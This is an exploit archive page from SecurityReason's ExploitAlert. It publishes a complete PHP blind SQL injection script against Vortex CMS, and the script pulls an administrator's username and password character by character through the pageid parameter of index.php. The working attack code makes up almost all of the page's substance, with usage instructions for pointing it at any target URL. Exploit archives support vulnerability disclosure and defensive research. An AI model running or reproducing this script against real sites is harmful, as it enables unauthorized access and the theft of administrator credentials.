Register | Forget Password | Login
Search :
SecurityReason

News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research

WLB

WLB Database

Send to WLB

About WLB

RSS

News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Corporate

Contact

About us

Services

SecurePHP

Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Details : ExploitAlert

  Topic : Vortex CMS (index.php pageid) Blind SQL Injection Exploit
  ExploitAlert : 3896
  Credit : Lidloses_Auge
  Date : 12.5.2008

  Download

  Exploit Code :  

<?php
ini_set("max_execution_time",0);
print_r('
###############################################################
#
# Vortex CMS - Blind SQL Injection Exploit
#
# Vulnerability discovered by: Lidloses_Auge
# Exploit coded by: Lidloses_Auge
# Greetz to: -=Player=- , Suicide, g4ms3, enco
# GPM, Free-Hack
# Date: 10.05.2008
#
###############################################################
#
# Usage: php '.$argv[0].' [Target] [Page ID] [User ID]
# Example for "http://www.site.com/cms/index.php?pageid=1"
# => php '.$argv[0].' http://www.site.com/cms/ 1 1
#
###############################################################
');
if ($argc > 1) {
print_r('
');
echo 'Searching for Admin: ';
for($i=1; $i <= 50; $i++) {
$temp1 =
file_get_contents($argv[1].'index.php?pageid='.$argv[2].'\'and+length((s
elect+username+from+system_users_logins+where+id='.$argv[3].'))='.$i.'/*
');
if (strpos($temp1,'Sorry, the page you requested could not be
found.') == 0) {
$adlen = $i;
$i = 50;
}
}
for($i=1; $i <= $adlen; $i++) {
for($zahl=46; $zahl <= 122; $zahl++) {
$temp =
file_get_contents($argv[1].'index.php?pageid='.$argv[2].'\'and+ascii(sub
string((select+username+from+system_users_logins+where+id='.$argv[3].'),
'.$i.',1))='.$zahl.'/*');
if (strpos($temp,'Sorry, the page you requested could not be
found.') == 0) {
echo chr($zahl);
$zahl = 122;
}
if ($zahl == 57) {
$zahl = 64;
}
}
}
print_r('
');
echo 'Searching for Password: ';
for($i=1; $i <= 50; $i++) {
$temp1 =
file_get_contents($argv[1].'index.php?pageid='.$argv[2].'\'and+length((s
elect+password+from+system_users_logins+where+id='.$argv[3].'))='.$i.'/*
');
if (strpos($temp1,'Sorry, the page you requested could not be
found.') == 0) {
$adlen = $i;
$i = 50;
}
}
for($i=1; $i <= $adlen; $i++) {
for($zahl=46; $zahl <= 122; $zahl++) {
$temp =
file_get_contents($argv[1].'index.php?pageid='.$argv[2].'\'and+ascii(sub
string((select+password+from+system_users_logins+where+id='.$argv[3].'),
'.$i.',1))='.$zahl.'/*');
if (strpos($temp,'Sorry, the page you requested could not be
found.') == 0) {
echo chr($zahl);
$zahl = 122;
}
if ($zahl == 57) {
$zahl = 64;
}
}
}
}
?>



Alert

*BSD libc (strfmon) Multiple vulnerabilities

high- 2008-03-25

Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems.

Apache rss

» Apache-SSL memory
   disclosure

» Apache mod_negotiation
   Xss and Http Response
   Splitting

» Apache (mod_status)
   Refresh Header - Open
   Redirector (XSS)

» Apache (mod_proxy_ftp)
   Undefined Charset UTF-7
   XSS Vulnerability

PHP rss

» PHP 5.2.6 chdir(),ftok()
   (standard ext) safe_mode
   bypass

» PHP 5.2.6 posix_access()
   (posix ext) safe_mode
   bypass

» PHP 5.2.5 and prior :
   *printf() functions
   Integer Overflow

» PHP 5.2.5 cURL safe_mode
   bypass

Copyright © SecurityReason. All Rights Reserved.